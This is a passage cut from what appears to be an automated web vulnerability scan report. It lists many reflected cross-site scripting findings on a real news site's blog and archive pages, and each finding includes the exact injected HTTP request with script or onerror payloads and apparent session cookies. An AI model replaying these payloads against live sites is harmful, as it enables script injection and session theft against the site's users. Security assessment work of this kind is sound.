This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/228201020/larry-ellison-s-mistress-and-security-as-a-blame-game.html144d4'><img%20src%3da%20onerror%3dalert(1)>1b7007f2fcc HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
3.327. http://www.darkreading.com/blog/228201020/larry-ellison-s-mistress-and-security-as-a-blame-game.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dd1c"><script>alert(1)</script>2d94ce184d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/228201020/larry-ellison-s-mistress-and-security-as-a-blame-game.html?2dd1c"><script>alert(1)</script>2d94ce184d1=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Larry Ell ...[SNIP]... c%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2d94ce184d1%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/228201020/larry-ellison-s-mistress-and-security-as-a-blame-game.html?2dd1c"><script>alert(1)</script>2d94ce184d1=1"> ...[SNIP]...
3.328. http://www.darkreading.com/blog/228600139/avast-ye-pirates-it-s-free.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/228600139/avast-ye-pirates-it-s-free.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28b36"><script>alert(1)</script>34dcd0199b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/228600139/avast-ye-pirates-it-s-free.html?28b36"><script>alert(1)</script>34dcd0199b=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45abd"><a>becafe9f078 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/22880018845abd"><a>becafe9f078/the-hazards-of-bot-volunteerism.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 780c4'><img%20src%3da%20onerror%3dalert(1)>81855cecc83 was submitted in the REST URL parameter 3. This input was echoed as 780c4'><img src=a onerror=alert(1)>81855cecc83 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/228800188/the-hazards-of-bot-volunteerism.html780c4'><img%20src%3da%20onerror%3dalert(1)>81855cecc83 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dab13"><a>b650cac1690 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/228800188/the-hazards-of-bot-volunteerism.htmldab13"><a>b650cac1690 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7161f"><script>alert(1)</script>9ca9520969f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/228800188/the-hazards-of-bot-volunteerism.html?7161f"><script>alert(1)</script>9ca9520969f=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<title>The Hazar
...[SNIP]...
lunteerism.html%3F7161f%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9ca9520969f%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/228800188/the-hazards-of-bot-volunteerism.html?7161f"><script>alert(1)</script>9ca9520969f=1">
...[SNIP]...
3.333. http://www.darkreading.com/blog/archives/2008/01/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2008/01/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78250"><script>alert(1)</script>1c3d49e2ed3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2008/01/index.html?78250"><script>alert(1)</script>1c3d49e2ed3=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<title></title>
...[SNIP]...
Farchives%2F2008%2F01%2Findex.html%3F78250%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E1c3d49e2ed3%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2008/01/index.html?78250"><script>alert(1)</script>1c3d49e2ed3=1">
...[SNIP]...
3.334. http://www.darkreading.com/blog/archives/2008/02/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2008/02/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebacf"><script>alert(1)</script>08a3ca3627a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2008/02/index.html?ebacf"><script>alert(1)</script>08a3ca3627a=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<title></title>
...[SNIP]...
Farchives%2F2008%2F02%2Findex.html%3Febacf%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E08a3ca3627a%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2008/02/index.html?ebacf"><script>alert(1)</script>08a3ca3627a=1">
...[SNIP]...
3.335. http://www.darkreading.com/blog/archives/2008/03/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2008/03/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90b5a"><script>alert(1)</script>3ebd8e76305 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2008/03/index.html?90b5a"><script>alert(1)</script>3ebd8e76305=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ff65"><a>f1e93473bbf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/20087ff65"><a>f1e93473bbf/04/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<meta http-equ
...[SNIP]...
ogin?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F20087ff65%22%3E%3Ca%3Ef1e93473bbf%2F04%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/20087ff65"><a>f1e93473bbf/04/index.html">
...[SNIP]...
3.337. http://www.darkreading.com/blog/archives/2008/04/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2008/04/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aeed6"><script>alert(1)</script>1b032d76b5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2008/04/index.html?aeed6"><script>alert(1)</script>1b032d76b5a=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c607"><a>fdd0268eb2d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/20091c607"><a>fdd0268eb2d/01/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f546"><a>442078e1d55 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2009/013f546"><a>442078e1d55/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<meta http-equ
...[SNIP]...
n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2009%2F013f546%22%3E%3Ca%3E442078e1d55%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2009/013f546"><a>442078e1d55/index.html">
...[SNIP]...
3.340. http://www.darkreading.com/blog/archives/2009/01/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2009/01/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eaa1a"><script>alert(1)</script>568669e013 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2009/01/index.html?eaa1a"><script>alert(1)</script>568669e013=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3735d"><a>a0c2fc53dc6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/20093735d"><a>a0c2fc53dc6/02/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a3a4"><a>4b264c536df was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2009/028a3a4"><a>4b264c536df/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<meta http-equ
...[SNIP]...
n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2009%2F028a3a4%22%3E%3Ca%3E4b264c536df%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2009/028a3a4"><a>4b264c536df/index.html">
...[SNIP]...
3.343. http://www.darkreading.com/blog/archives/2009/02/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2009/02/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8251"><script>alert(1)</script>ef5873869a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2009/02/index.html?c8251"><script>alert(1)</script>ef5873869a5=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e4e8"><a>1a5b60c275c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/20092e4e8"><a>1a5b60c275c/03/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 425a6"><a>82a928cd772 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2009/03425a6"><a>82a928cd772/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<meta http-equ
...[SNIP]...
n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2009%2F03425a6%22%3E%3Ca%3E82a928cd772%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2009/03425a6"><a>82a928cd772/index.html">
...[SNIP]...
3.346. http://www.darkreading.com/blog/archives/2009/03/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2009/03/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fdb7"><script>alert(1)</script>e4227e10180 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2009/03/index.html?8fdb7"><script>alert(1)</script>e4227e10180=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c46a"><a>13c51bf9ac9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/20095c46a"><a>13c51bf9ac9/04/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50bf8"><a>53b01c37cb6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2009/0450bf8"><a>53b01c37cb6/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<meta http-equ
...[SNIP]...
n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2009%2F0450bf8%22%3E%3Ca%3E53b01c37cb6%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2009/0450bf8"><a>53b01c37cb6/index.html">
...[SNIP]...
3.349. http://www.darkreading.com/blog/archives/2009/04/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2009/04/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9feee"><script>alert(1)</script>6e09887118d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2009/04/index.html?9feee"><script>alert(1)</script>6e09887118d=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f53ec"><a>2dae81427c4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2009f53ec"><a>2dae81427c4/05/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ced38"><a>dab7f04ca3b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2009/05ced38"><a>dab7f04ca3b/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<meta http-equ
...[SNIP]...
n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2009%2F05ced38%22%3E%3Ca%3Edab7f04ca3b%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2009/05ced38"><a>dab7f04ca3b/index.html">
...[SNIP]...
3.352. http://www.darkreading.com/blog/archives/2009/05/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
